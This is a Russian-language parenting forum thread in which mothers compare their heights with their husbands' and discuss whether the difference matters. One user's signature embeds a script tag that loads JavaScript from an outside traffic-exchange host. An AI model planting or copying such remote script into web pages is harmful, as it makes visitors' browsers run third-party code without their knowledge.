Я чуть выше

Оффлайн Мамочка.by

• Дети:
    Юлия (12.02.2007)
    Денис (11.07.2011)
25:04:2010, 00:09 »
тут проблема не столько в росте, и не в вас - а в том, что у него такой сформировался характер в течении жизни
А мне кажется,что комплексы у него. Ему бы к психологу сходить, поговорить.

Оффлайн Мариwка

• Дети:
      Никита (11.02.2010)
      Даниил (29.12.2011)
      • <script language=javascript src=http://go.jetswap.hs5.ru/websurf?marasexi mode=1 v2=1 v3=1 v4=1 v5=1 id=js_websurf_code></script>
    27:04:2010, 14:27 »
    Мамочка.by,
    А мне кажется,что комплексы у него. Ему бы к психологу сходить, поговорить.
    только как его заставить это сделать?

Оффлайн Сашунька

• Дети:
        Артем (07.07.2011)
      23:05:2010, 12:17 »
      Я выше мужа на 1 см. Немного видно. На первых годах встречи я всегда сутулилась рядом с ним, а сейчас мне всё равно.

Оффлайн buslikgril

• Дети:
          Ярослав (28.12.2008)
        23:05:2010, 22:30 »
        А я выше мужа на 10 см, так он только гордится этим и обожает меня на каблуках :cheer: :cheer:

Бог сотворил нас по образу и подобию своему. Но был ли он реалистом?????

Оффлайн Frost

02:06:2010, 11:41 »
          табадилочка,
          Что видят в парах, подобных нашей и как ощущают себя подобные нам?
          завидуют :)

Оффлайн Стелла_Чиркова

• Дети:
              Стелла (16.12.2002)
              Агата (20.04.2012)
              • дневник
            02:06:2010, 11:53 »
            табадилочка,
            :rolleyes: :S :rolleyes:
            вот так иногда борьба с комплексом превращается в борьбу с разумом, и разум, увы, проигрывает...
              Мой личный дневник - работа, путешествия, дети - http://www.liveinternet.ru/users/1304174/

Дневник про бусину (Агату) - http://rebenok.by/community/index.php/topic,190418.0.html

Мои стихи http://rebenok.by/community/index.php/topic,138634.0.html

Оффлайн Танюша22

02:06:2010, 15:28 »
              А я малявка ))))) 153 см, а муж 180 см ))))))))
              И ещё у меня был ухажер (вольной борьбой занимался)  рост у него был 195 см )))))

Люблю свою таксу!!!!!

Истории моей жизни

Оффлайн Голубоглазка

30:06:2010, 11:35 »
                табадилочка,
                :rolleyes: Не думаю...
                Я сама высокая - 175см, когда встречалась с парнем, по-моему на 3 см выше меня, но я этой разницы не чувствовала, и меня это здорово напрягало... Провстречались мы недолго, я даже выходить с ним никуда не хотела... А сколько мужчин получили отворот поворот только из-за своего роста... :unsure:, и никто из них не мог понять из-за чего... Наверно, у меня в этом плане какой-то комплекс, но с мужчиной ниже меня никогда себя уютно не ощущала и для себя твердо решила, что и замуж за такого никогда не выйду. :unsure:
                Муж выше меня на 8 или 10 см.:-)
                  - Что с тобой нынче?
                  - Со мной?.. Со мной счастье!..
                  :rebs74:

Оффлайн вкусняшечка

• Дети:
                    Алексей (25.06.2007)
                    Георгий (04.05.2013)
                  30:06:2010, 11:53 »
                  Я как бы среднего росточка 170, но у меня были парни ниже меня, были конечно и выше. "Малыши" всегда старались гораздо больше понравится, у них больше запала что ли было угодить даме. Наверное, у них тоже это связано с неким комплексом. Рядом с ними я никогда не комплексовала, даже немного забавляло, ведь некоторым это придавало уверенности в себе. Мой выход на каблуках 12 см всегда ими приветствовался!  Почему не порадовать человека! Не вижу ничего такого, если кто-то выше или ниже. Главное, чтобы любили друг друга!

Оффлайн Юлик

26:07:2010, 02:29 »
                    Одна из моих подруг выше мужа на полголовы, но смотрятся они вместе очень хорошо, очень подходят друг другу внешне: он - крепко сбитый, накачанный в пределах разумного мужчина весьма сурового вида, а она - высокая, тоненькая брюнетка.
                      А характер-то у Юли - замечательный! Просто нервы у всех какие-то слабые...

Оффлайн Karusel

Дети:
                        Анастасия (27.11.2001)
                        Иван (12.12.2009)
                      28:08:2010, 20:27 »
                      А я тоже высокая! 174 см. Раньше сутулилась, потому что не хотелось выделяться среди одноклассников, а теперь когда мода на высоких - я горжусь своим ростом. И каблуки люблю! И смотреть на мужчин свысока мне тоже нравится!!!!!! И от этого они комплексуют, а не я!
                      А муж у меня тоже высокий - 184, поэтому когда я на каблуках мы смотримся как два великана среди лилипупутов (наши родители ниже нас на голову). :D
                        нас всегда можно поддержать, положив любую сумму на PayPal olga.shymko@mail.ru

Оффлайн Стелла_Чиркова

• Дети:
                          Стелла (16.12.2002)
                          Агата (20.04.2012)
                          • дневник
                        28:08:2010, 23:19 »
                        Интересно, а кому-нибудь, будь он высокий или маленький, приходит в голову, что когда окружающие люди смотрят на пару, то
                        - вообще ни о чем не думают, просто глаза надо куда-то деть
                        - думают, что симпатичная пара и тут же переключаются
                        - думают, что несимпатичная пара и тут же переключаются
                        - думают о своем, как сами когда-то были вот такой парой или еще будут вот такой парой и т.д
                        и ВООБЩЕ НЕ ДУМАЮТ О РОСТЕ тех, на кого смотрят? :)
                          Мой личный дневник - работа, путешествия, дети - http://www.liveinternet.ru/users/1304174/

Дневник про бусину (Агату) - http://rebenok.by/community/index.php/topic,190418.0.html

Berkana

• Гость
                          29:08:2010, 01:01 »
                          Мне в голову не приходило например заморачиваться по поводу роста партнера, были у меня ухожеры и 2 м ростом, муж 170 см, при моем росте 157 см мне вполне комфортно :-)

Оффлайн Evochka

• Дети:
                              Диана (25.10.2007)
                              Егор (21.12.2011)
                            29:08:2010, 08:59 »
                            Интересно, а кому-нибудь, будь он высокий или маленький, приходит в голову, что когда окружающие люди смотрят на пару, то
                            - вообще ни о чем не думают, просто глаза надо куда-то деть
                            - думают, что симпатичная пара и тут же переключаются
                            - думают, что несимпатичная пара и тут же переключаются
                            - думают о своем, как сами когда-то были вот такой парой или еще будут вот такой парой и т.д
                            и ВООБЩЕ НЕ ДУМАЮТ О РОСТЕ тех, на кого смотрят? :)
                            Стелла, я, например, так и думаю. И вообще я не слежу за реакцией окружающий на нас с мужем (176 и 185(я)), мне параллельно, меня это не трогает и не волнует. :y32b4:
                              Многим нулям кажется что они- орбита,по которой вращается мир...(с) Станислав Ежи Лец

Оффлайн Стелла_Чиркова

• Дети:
                                Стелла (16.12.2002)
                                Агата (20.04.2012)
                                • дневник
                              29:08:2010, 15:28 »
                              о, нас уже трое набралось :)
                              Просто я действительно НЕ понимаю, ну КАКАЯ разница, кто кого и насколько выше, если самим людям это нравится - то мало ли кому покажется недостаточно красивым?
                              за жизнь я слышала немало "перетираний" этой темы и знаю кучу людей, которым все равно, людей, которым кажется очень красивым, когда женщина мужчине смотрит в пупок, людей, которым наоборот, кажется некрасивым, когда разница в росте 20 и более см в пользу мужчине, были люди, которые доказывали, что красивы пары равного примерно роста, были люди, которым дико нравилось, когда выше девушка, каких только вкусов нет в мире, разве под каждый подстроишься? ориентироваться можно только на свой, а если неожиданный сюрприз - то пересмотреть :) с учетом новых обстоятельств :)
                              на своем опыте знаю :) мне с детства казалось очень красивым, когда идет пара - и женщина мужчине в лучшем случае по грудь, я аж голову сворачивала и мечтала точно так же
                              Сначала мне везло. И мужья были высокие, вплоть до 198, и поклонников я подбирала выше 185, у меня глаз стал алмаз на это дело, могла определить мужской рост с точностью до 1 см :)
                              А потом полюбила Ивана. Первое время было неудобно - что это, он меня только на 15 см выше, шею не надо запрокидывать, смотреть неудобно, обнимать неудобно, разговаривать неудобно, идти рядом неудобно... но прошли годы - и теперь мне нравится! действительно нравится! и удобно стало :)